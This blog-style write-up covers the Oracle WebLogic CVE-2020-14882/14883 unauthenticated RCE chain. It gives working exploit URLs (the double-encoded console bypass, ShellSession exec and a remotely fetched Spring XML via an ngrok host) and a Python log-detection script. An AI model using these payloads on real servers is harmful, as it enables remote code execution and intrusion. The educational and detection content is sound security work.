Oracle WebLogic Server Vulnerability: CVE-2020-14882

Rapid SafeGuard
Nov 6, 2020

What is VulnMachines?

Hi Pentesters, this is Punit Darji. I have created a platform called VulnMachines. This platform is for people who want to learn about cyber security and pentesting with real-life scenarios. Therefore, I have decided to deliver real-life scenario-based labs, from basic to advanced level, CVE labs and many other practical exercises that will help you improve your knowledge. You can join this platform as an individual or as a team.

Oracle WebLogic vulnerability

CVE-2020-14882 Oracle WebLogic Server

This vulnerability lets an unauthenticated attacker reach the administration console (console.portal) through path traversal. The /console/css/ path is served without authentication, and a double-URL-encoded ../ (%252e%252e%252f) survives the container's first decode, so the authorization check still sees a request for a css resource, while the console decodes the path once more and serves console.portal. The fix shipped in Oracle's October 2020 Critical Patch Update.

http://your-ip:port/console/css/%252e%252e%252fconsole.portal
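To make the mechanism concrete, here is an added example (my own code, not part of the original post) that reproduces the two rounds of percent-decoding WebLogic performs, normalises the result, and then runs the same check over a few constructed access-log lines so the bypass can be spotted in logs. The log format, addresses and timestamps are made up; the check flags any request under the unauthenticated /console/css/ prefix that resolves to console.portal, whether the traversal was single- or double-encoded.

```python
"""Why the CVE-2020-14882 bypass URL works, and how to spot it in access logs.

Added example (not from the original post). The log lines below are
constructed for illustration; /console/css/ being reachable without
authentication is the documented precondition of the bypass.
"""
import posixpath
import re
from urllib.parse import unquote, urlsplit

ADMIN_CONSOLE = "/console/console.portal"


def decode_until_stable(path: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until nothing changes.

    The container decodes the path once and the console decodes it again,
    so "%252e%252e%252f" -> "%2e%2e%2f" -> "../". The round cap keeps a
    hostile string from turning this into an unbounded loop.
    """
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def effective_path(raw_path: str) -> str:
    """Path the console actually serves after decoding and normalising."""
    decoded = decode_until_stable(raw_path)
    # normpath collapses "/console/css/../console.portal" to
    # "/console/console.portal".
    return posixpath.normpath(decoded)


def is_console_bypass(raw_target: str) -> bool:
    """True when a request under the unauthenticated /console/css/ prefix
    resolves to the administration console after decoding."""
    path_only = urlsplit(raw_target).path
    if not path_only.startswith("/console/css/"):
        return False
    return effective_path(path_only) == ADMIN_CONSOLE


# Constructed access-log lines in Apache combined-style format (not real
# WebLogic logs); 10.0.0.9 is the pretend attacker.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2020:10:01:02 +0000] "GET /console/css/login.css HTTP/1.1" 200 1234
10.0.0.9 - - [06/Nov/2020:10:01:05 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 5678
10.0.0.9 - - [06/Nov/2020:10:01:07 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec('id');%22) HTTP/1.1" 200 5678
10.0.0.7 - - [06/Nov/2020:10:02:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_bypass_requests(log_text: str) -> list:
    """Return the parsed entries whose request target is a console bypass."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_console_bypass(m["target"]):
            hits.append({"ip": m["ip"], "target": m["target"],
                         "status": m["status"]})
    return hits


if __name__ == "__main__":
    print(effective_path("/console/css/%252e%252e%252fconsole.portal"))
    for hit in flag_bypass_requests(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["target"])
```

A 200 on a flagged line means the console was served to an unauthenticated client; a patched server answers the same request with a redirect to the login form, so the status code is the quickest triage signal once the path check has found candidates.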


CVE-2020-14883 Oracle WebLogic Server vulnerability

CVE-2020-14883 is the second half of the chain. The console's handle parameter is used to instantiate a class named in the request, passing the text in parentheses as a single string constructor argument. On its own this requires console access, but combined with the bypass above it gives unauthenticated remote code execution. Two gadget classes are commonly used:

com.tangosol.coherence.mvel2.sh.ShellSession
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

Let's start with the first method, using ShellSession.

http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/exploit1');")

Sent this payload using Burp Suite; the command creates the file /tmp/exploit1 on the server.

Before request.

The exploit1 file has been created inside the container, which confirms the command ran:

After successfully executing the request.

Note: this method only works on WebLogic 12.2.1 and later, because 10.3.6 does not ship the com.tangosol.coherence.mvel2.sh.ShellSession class.

Second method using FileSystemXmlApplicationContext.

In this method, craft a Spring beans XML file and serve it from an HTTP server that WebLogic can reach, such as localhost, a Python http.server, or any other server. In this attack I have used ngrok.

Inside poc.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value><![CDATA[touch /tmp/exploit2]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Capture the request with Burp Suite and point the handle argument at the poc.xml served through ngrok.

http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://ngrok.service/poc.xml")
After executing the request.

Note: the limitation of this method is that the WebLogic server itself must be able to fetch the malicious XML, so it needs outbound HTTP access to wherever the file is hosted.

Video PoC

Hire me!!

Twitter : https://twitter.com/rapidsafeguard

YouTube : https://www.youtube.com/c/RapidSafeGuard/playlists
